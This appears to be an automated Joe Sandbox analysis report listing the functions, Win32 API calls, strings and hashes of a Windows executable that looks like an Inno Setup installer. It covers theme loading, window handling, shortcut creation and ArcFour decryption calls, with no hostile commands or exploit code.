Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 0042EE35
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000001), ref: 0042EE45
CreateMutexA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0042EE6D

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DescriptorSecurity$CreateDaclInitializeMutex
String ID:
API String ID: 3525989157-0
Opcode ID: e535240892797685b4ab9d9c929302bfb3a48c93a5258e40853e85be58f26cad
Instruction ID: b330794617a7040f76ad0da05c7b1ee5a1856395dd3e8d048ce20caf316d4231
Opcode Fuzzy Hash: e535240892797685b4ab9d9c929302bfb3a48c93a5258e40853e85be58f26cad
Instruction Fuzzy Hash: 18E0C0B16443007EE200EE758C82F5F76DCDB48714F00483AB654DB1C1E679D9489B96

Function 00417CDE Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00417D1F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID:
API String ID: 568898626-0
Opcode ID: 1c91201d2ff36bc72c7178dd8424e8fae2c9e4961405fe597c6cb80dc68efef3
Instruction ID: ae07cbcaee7307856f0de191e02e21b90635fd34b211f34cef32728ab7ec892e
Opcode Fuzzy Hash: 1c91201d2ff36bc72c7178dd8424e8fae2c9e4961405fe597c6cb80dc68efef3
Instruction Fuzzy Hash: 2A017C31204108ABCB10EE59E8C1EEA73A8AF44324F054567FD08CF242D638ECC087A8

Function 004175A8 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004175D3
GetCapture.USER32 ref: 004175DC

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: a20d27f3b2ac0a1b3fa2ab67efc932bc7606427269a1e4b5a38f9b3ed8bb9e72
Instruction ID: 8b244cfd74e2e9025fb133a269c9ff628bd031c9e89e3e616ef14db29f4eec50
Opcode Fuzzy Hash: a20d27f3b2ac0a1b3fa2ab67efc932bc7606427269a1e4b5a38f9b3ed8bb9e72
Instruction Fuzzy Hash: CBF06232304A024BDB31A72EC885AEB62F59F88368B24443FE419C7765EB7CDCD58758

Function 004241A4 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004241AB

Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12

SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF

Part of subcall function 0042365C: ShowWindow.USER32(00410470,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$ActiveEnumIconicLongShowWindows
String ID:
API String ID: 2671590913-0
Opcode ID: 6a9b997a6a6cf91003675646eaf443a00e7e2891d5b78c90ff096ed1e4918312
Instruction ID: b7d9458b5e0a659a50abb462337f5bae1697c0dc3d856a04b5cc34dfb433b66f
Opcode Fuzzy Hash: 6a9b997a6a6cf91003675646eaf443a00e7e2891d5b78c90ff096ed1e4918312
Instruction Fuzzy Hash: 6CE01AA470010187DF00EFAADCC9B9632A8BF48304F55057ABC08CF24BDA3CC950C728

Function 004125E8 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 8e873b8b5c82bc258c14262f025a038593852d0d4569c028c12fccb2f86baf91
Instruction ID: e2daaee124a258af88011e7d59d1a34290a71591709d5bbd6185ea02eebcb9ba
Opcode Fuzzy Hash: 8e873b8b5c82bc258c14262f025a038593852d0d4569c028c12fccb2f86baf91
Instruction Fuzzy Hash: D851F6356082058FC710DB6AD681A9BF3E5FF98314B2482BBD824C7391D7B8EDA1C759

Function 00478EFC Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0047904A

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 2acbb7ee23148c44530fb96b869e7794becc65d69925435b63a344be70e19465
Instruction ID: a31957f8146ee59bbe5f7cc321da5d64c206ff61d5be307610cda5dda3fb314a
Opcode Fuzzy Hash: 2acbb7ee23148c44530fb96b869e7794becc65d69925435b63a344be70e19465
Instruction Fuzzy Hash: 7C413575614144EFDB10CF9DC6858AAB7F6FB48310B24C996E84CDB301D739EE419B54

Function 0045D2E4 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

ArcFourCrypt._ISCRYPT(?,?,?,0046DFA4,?,?,0046DFA4,00000000), ref: 0045D2EF

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CryptFour
String ID:
API String ID: 2153018856-0
Opcode ID: f72980deaa919cf0bcca330c95d094571c0b9ac3099722338076af053f3dc2d8
Instruction ID: b6c4cc1f99ef2e52d606a12bd82df8b216d3beaef2de20ba66a0ab70ac2c171e
Opcode Fuzzy Hash: f72980deaa919cf0bcca330c95d094571c0b9ac3099722338076af053f3dc2d8
Instruction Fuzzy Hash: 81C09BF240420C7F65005795ECC9C77B75CE6586547404136F704831019572AC104574

Function 0045D2FC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DC14,?,0046DDF5), ref: 0045D302

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CryptFour
String ID:
API String ID: 2153018856-0
Opcode ID: f277e602d1aa1d933ca60749d28492a83cf7560ca7b8b7592fc74e5de38efb5e
Instruction ID: 163ad57823698c1276c601513e35adbc52e9ec482f3283ddef75a5d9e9809592
Opcode Fuzzy Hash: f277e602d1aa1d933ca60749d28492a83cf7560ca7b8b7592fc74e5de38efb5e
Instruction Fuzzy Hash: 86A002F0F803007AFD2057615E0EF26252D97D0F05F2044757306EA0D085A5A401852C

Function 10001130 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3373763009.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.3373698152.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3373799669.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2

Function 10001000 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3373763009.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.3373698152.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3373799669.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
Instruction Fuzzy Hash:

Function 0044B6CC Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B678: GetVersionExA.KERNEL32(00000094), ref: 0044B695

LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F7E9,004992CA), ref: 0044B6F3
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B70B
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B71D
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B72F
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B741
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B753
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B765
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B777
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B789
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B79B
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B7AD
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B7BF
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B7D1
GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B7E3
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B7F5
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B807
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B819
GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B82B
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B83D
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B84F
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B861
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B873
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B885
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B897
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B8A9
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B8BB
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B8CD
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B8DF
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B8F1
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B903
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B915
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B927
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B939
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B94B
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B95D
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B96F
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B981
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B993
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B9A5
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B9B7
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B9C9
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B9DB
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B9ED
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B9FF
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044BA11
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044BA23
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044BA35
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044BA47

Strings

uxtheme.dll, xrefs: 0044B6EE
SetThemeAppProperties, xrefs: 0044B9F7
GetThemeDocumentationProperty, xrefs: 0044BA1B
GetWindowTheme, xrefs: 0044B9AF
GetThemePropertyOrigin, xrefs: 0044B8D7
CloseThemeData, xrefs: 0044B715
SetWindowTheme, xrefs: 0044B8E9
DrawThemeEdge, xrefs: 0044B7C9
GetThemeRect, xrefs: 0044B8A1
GetCurrentThemeName, xrefs: 0044BA09
GetThemeMetric, xrefs: 0044B823
GetThemeTextExtent, xrefs: 0044B781
GetThemeBackgroundContentRect, xrefs: 0044B74B, 0044B75D
GetThemeColor, xrefs: 0044B811
GetThemeFilename, xrefs: 0044B8FB
GetThemeSysSize, xrefs: 0044B943
GetThemeSysFont, xrefs: 0044B955
GetThemeSysString, xrefs: 0044B967
GetThemeString, xrefs: 0044B835
GetThemeSysColor, xrefs: 0044B90D
IsThemeDialogTextureEnabled, xrefs: 0044B9D3
DrawThemeText, xrefs: 0044B739
GetThemeBackgroundRegion, xrefs: 0044B7A5
GetThemeAppProperties, xrefs: 0044B9E5
IsThemePartDefined, xrefs: 0044B7ED
IsThemeBackgroundPartiallyTransparent, xrefs: 0044B7FF
GetThemePartSize, xrefs: 0044B76F
HitTestThemeBackground, xrefs: 0044B7B7
EnableThemeDialogTexture, xrefs: 0044B9C1
GetThemeEnumValue, xrefs: 0044B86B
GetThemePosition, xrefs: 0044B87D
GetThemeFont, xrefs: 0044B88F
DrawThemeBackground, xrefs: 0044B727
GetThemeSysColorBrush, xrefs: 0044B91F
GetThemeSysInt, xrefs: 0044B979
IsThemeActive, xrefs: 0044B98B
GetThemeBool, xrefs: 0044B847
GetThemeTextMetrics, xrefs: 0044B793
GetThemeInt, xrefs: 0044B859
DrawThemeParentBackground, xrefs: 0044BA2D
DrawThemeIcon, xrefs: 0044B7DB
EnableTheming, xrefs: 0044BA3F
GetThemeMargins, xrefs: 0044B8B3
OpenThemeData, xrefs: 0044B703
GetThemeSysBool, xrefs: 0044B931
GetThemeIntList, xrefs: 0044B8C5
IsAppThemed, xrefs: 0044B99D

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoadVersion
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 1968650500-2910565190
Opcode ID: a839ccb9c9a861a6ca06feeaf4f5b9cf9d009b24b8deb6d9a0dd113e88dab802
Instruction ID: 8a2f9fdf968ae37fa3cb46079294691732ee00746fcb1dbbaee87679a149b2ae
Opcode Fuzzy Hash: a839ccb9c9a861a6ca06feeaf4f5b9cf9d009b24b8deb6d9a0dd113e88dab802
Instruction Fuzzy Hash: D59153F0A40B51EBEB00EBB59CC6A2A37A8EB15B1471415BBB480EF295D778DC048F5D

Function 0041CA1C Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0041CA50
CreateCompatibleDC.GDI32(?), ref: 0041CA5C
CreateBitmap.GDI32(0041A954,?,00000001,00000001,00000000), ref: 0041CA80
CreateCompatibleBitmap.GDI32(?,0041A954,?), ref: 0041CA90
SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
CreateCompatibleDC.GDI32(?), ref: 0041CB3B
SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB84
RealizePalette.GDI32(00000000), ref: 0041CB8D
SelectPalette.GDI32(0041CE4C,00000000,00000001), ref: 0041CB9C
RealizePalette.GDI32(0041CE4C), ref: 0041CBA5
SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
BitBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020), ref: 0041CBF1
SelectObject.GDI32(00000000,?), ref: 0041CBFE
DeleteDC.GDI32(00000000), ref: 0041CC14

Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
String ID:
API String ID: 269503290-0
Opcode ID: cce4914916f1a7239ac88c37909b2d3847b69fcced41e26916e06273e7ac86df
Instruction ID: 4a976381369a00188f54b32674623e6c4b83415f3a667354aa154cca89d68730
Opcode Fuzzy Hash: cce4914916f1a7239ac88c37909b2d3847b69fcced41e26916e06273e7ac86df
Instruction Fuzzy Hash: 2C61EE71A44608AFDB10EBE9DC86FDFB7B8EF49704F14446AB504E7281D67CA940CB68

Function 004566E0 Relevance: 26.6, APIs: 4, Strings: 11, Instructions: 310comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0049AA74,00000000,00000001,0049A774,?,00000000,00456A8B), ref: 00456726
CoCreateInstance.OLE32(0049A764,00000000,00000001,0049A774,?,00000000,00456A8B), ref: 0045674C
SysFreeString.OLEAUT32(00000000), ref: 00456903

Strings

IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 00456972
IPropertyStore::Commit, xrefs: 0045698B
{pf32}\, xrefs: 004567C6
IPersistFile::Save, xrefs: 00456A0A
IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 004568E8
IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 00456865
CoCreateInstance, xrefs: 00456757
IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 00456899
IShellLink::QueryInterface(IID_IPersistFile), xrefs: 004569AC
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 0045693A
%ProgramFiles(x86)%\, xrefs: 004567D6

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateInstance$FreeString
String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
API String ID: 308859552-2363233914
Opcode ID: 4019791116f66badce9a962934a38fe6a925263bf281427cd9e28d1a80f6db8e
Instruction ID: 4df8bc5fd707d325f3bf8ee572e1ec6f0f953e2c79806aa5a0124fc00630fac3
Opcode Fuzzy Hash: 4019791116f66badce9a962934a38fe6a925263bf281427cd9e28d1a80f6db8e
Instruction Fuzzy Hash: CBB13170A00108AFDB50DFA9C985B9E7BF8AF49306F554066F804E7362DB78DD48CB69

Function 00472D44 Relevance: 23.1, APIs: 4, Strings: 9, Instructions: 341COMMON

Download Yara Rule

APIs

Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472EFC
SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00473017
SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0047302D
SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00473052

Strings

target.lnk, xrefs: 0047309C
Creating the icon., xrefs: 00472F11
.lnk, xrefs: 00472DD0
{group}\, xrefs: 00472D9E
Desktop.ini, xrefs: 004730D3
Dest filename: %s, xrefs: 00472E9E
Successfully created the icon., xrefs: 00472FF1
.pif, xrefs: 00472DF3, 00472F91
.url, xrefs: 00472E16

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

